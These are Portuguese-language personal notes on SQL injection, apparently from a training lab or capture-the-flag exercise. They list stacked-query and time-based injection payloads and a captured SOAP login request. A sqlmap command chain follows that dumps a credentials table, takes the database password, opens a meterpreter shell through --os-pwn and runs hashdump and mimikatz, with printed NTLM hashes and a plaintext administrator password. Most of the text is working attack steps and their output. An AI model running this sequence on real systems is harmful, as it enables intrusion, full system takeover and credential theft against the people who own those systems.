ALGUNS BIZUS DE SQL INJECTIONS


STACKED QUERIES - Para checar stacked querries usa-se o ";" (ponto-e-virgula), stacked query é muito bom pq permite injetar shell/meterpreter

TIME-BASED QUERRIES - Para checar time-based usa-se o "waitfor delay '00:00:10" ele vai esperar 10 segundos

PARA PREVENIR O TRIN (SPLIT FEITO PELA APLICAÇÃO NO FINAL DA QUERRY), após o comentário dar um espaço + ponto "'1 or 1=1 -- ."

admin'or 1=1; select 1 waitfor delay '00:00:10' -- .




ARQUIVO SOAPREQUEST.TXT
---------------------------------------------------------------------------------------------------------------------------------------
POST /CyberCampWS/index.php HTTP/1.1
Host: 192.168.10.106
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/xml
Soapaction: urn:server/autenticacion
Content-Length: 348
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <autenticacion xmlns="urn:server">
      <usuario>sddsfs</usuario>
      <password>sdfsdf</password>
    </autenticacion>
  </soap:Body>
</soap:Envelope>
---------------------------------------------------------------------------------------------------------------------------------------


CHECANDO O BANCO DE DADOS
# sqlmap -r soaprequest.txt --batch --level=5 --risk=3 

VER O DATABASE
# sqlmap -r soaprequest.txt --batch --level=5 --risk=3 --dbs

VER AS TABELAS DA DATABASE WS
# sqlmap -r soaprequest.txt --batch --level=5 --risk=3 -D WS --tables

PORQUE O "WS" ? 

	porque os outros já eram por padrão do MS SQL SERVER 2005

		master
		model
		msdb
		tempdb
		WS         <--------- ALVO

VER A TABELA AUTH DO DATABSE WS
# sqlmap -r soaprequest.txt --batch --level=5 --risk=3 -D WS -T AUTH --columns

DUMP DA TABELA
# sqlmap -r soaprequest.txt --batch --level=5 --risk=3 -D WS -T AUTH --columns --dump

+----------+---------------------------------------------------+
| USERNAME | PASSWORD                                          |
+----------+---------------------------------------------------+
| jesus    | bf2f749e80c970f50552e9d5f3e8434e78b88d35 (matrix) |
+----------+---------------------------------------------------+

PEGANDO O PASSWORD DO MS SQL SERVER 2005
# sqlmap -r soaprequest.txt --threads 10 --batch --password


PEGANDO O SHELL
# sqlmap -r soaprequest.txt --batch --level=5 --risk=3 --os-pwn

meterpreter > hashdump

Administrador:500:66e5d5ae82299cb6aad3b435b51404ee:c02478537b9727d391bc80011c2e2321:::
Asistente de ayuda:1000:b15e5c1ced52893c2eaa0fbf1cc11045:32da5b1a33d4b1ad6a2b98f67a1133d1:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
jesus:1006:66e5d5ae82299cb6aad3b435b51404ee:c02478537b9727d391bc80011c2e2321:::
rolling:1007:f67ce55ac831223dc187b8085fe1d9df:161cff084477fe596a5db81874498a24:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:66d0584183db2c8ae169865183899ffa:::

meterpreter > use mimikatz
Loading extension mimikatz...success.
meterpreter > kerberos

kerberos credentials
====================

AuthID    Package    Domain           User              Password
------    -------    ------           ----              --------
0;997     Negotiate  NT AUTHORITY     SERVICIO LOCAL    
0;996     Negotiate  NT AUTHORITY     Servicio de red   
0;55702   NTLM                                          
0;999     NTLM       WORKGROUP        SCADA-1519CEC3A$  
0;200038  NTLM       SCADA-1519CEC3A  Administrador     matrix